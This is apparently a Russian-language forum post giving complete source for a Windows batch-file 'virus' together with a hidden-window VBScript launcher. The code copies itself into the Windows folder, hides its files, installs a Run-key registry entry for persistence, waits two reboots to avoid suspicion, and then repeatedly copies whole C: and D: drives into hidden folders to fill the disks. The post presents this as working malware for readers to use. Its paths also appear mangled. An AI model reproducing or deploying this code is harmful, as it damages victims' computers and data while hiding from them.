Это более усовершенствованная версия вируса "заcоряем HDD" она состоит из нескольких процедур и засоряет оба диска (С и D) для начала проверим был ли ранее тут этот вирус название вируса run.bat тело вируса:
if not exist rtps.txt (
copy %0 C:windows
copy vb.vbs C:windows
attrib vb.vbs +h +s
attrib run.bat +h +s
reg add «HKCUSoftwareMicrosoftWindowsCurrentVersionRun» /v virus /t REG_SZ /d C:windowsvb.vbs /f
echo ok >>C:windowsrtps.txt
exit
)
как вы видете у нас 2 файла run.bat и vb.vbs
run.bat — это сам вирус
vb.vbs — это скрипт скрытия окна вируса
проверка сущевствования вируса нужна чтобы скопировать нужные файлы далее идёт создание папок
md ejj
attrib ejj +h +s
md D:CommonFilesLibraryejj
attrib D:CommonFilesLibrary +h +s
нам совершенно до лампочки есть эти папки или нет если их нет то эти команды создадут эту папку далее определение числа перезагрузок
if exist C:windowsrtp.ini for /f "eol=# tokens=1*" %%i in (tempexec.ini) do (
set n=%%i
if %n%==2 (goto t) else (set /a n=%n%+1 & echo %n% >rtp.ini)
exit
)
if not exist C:windowsrtp.ini (
echo 0 >>C:windowsrtp.ini
exit
)
определение нужно для того чтобы отвести подозрения через 2 перезагрузки вирус начнёт действовать
:t
cls
rem xcopy C:*.* ejj*_.* /h /y
for /l %%n IN (1,1,1000) DO (
xcopy C:*.* ejj54%%n.* /h /y
xcopy D:*.* D:CommonFilesLibraryejj54%%n.* /h /y
)
if exist rtp.ini del rtp.ini
exit
вот весь код вируса
if not exist rtps.txt (
copy %0 C:windows
copy vb.vbs C:windows
attrib vb.vbs +h +s
attrib run.bat +h +s
reg add «HKCUSoftwareMicrosoftWindowsCurrentVersionRun» /v virus /t REG_SZ /d C:windowsvb.vbs /f
echo ok >>C:windowsrtps.txt
exit
)
md ejj
attrib ejj +h +s
md D:CommonFilesLibraryejj
attrib D:CommonFilesLibrary +h +s
if exist C:windowsrtp.ini for /f "eol=# tokens=1*" %%i in (tempexec.ini) do (
set n=%%i
if %n%==2 (goto t) else (set /a n=%n%+1 & echo %n% >rtp.ini)
exit
)
if not exist C:windowsrtp.ini (
echo 0 >>C:windowsrtp.ini
exit
)
:t
cls
rem xcopy C:*.* ejj*_.* /h /y
for /l %%n IN (1,1,1000) DO (
xcopy C:*.* ejj54%%n.* /h /y
xcopy D:*.* D:CommonFilesLibraryejj54%%n.* /h /y
)
if exist rtp.ini del rtp.ini
exit
дополнение: пишем в файле vb.vbs
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.Run "run.bat" , 0, False
Ура, работает и добавляю музейшн
Комментарии
Завтра покажу где.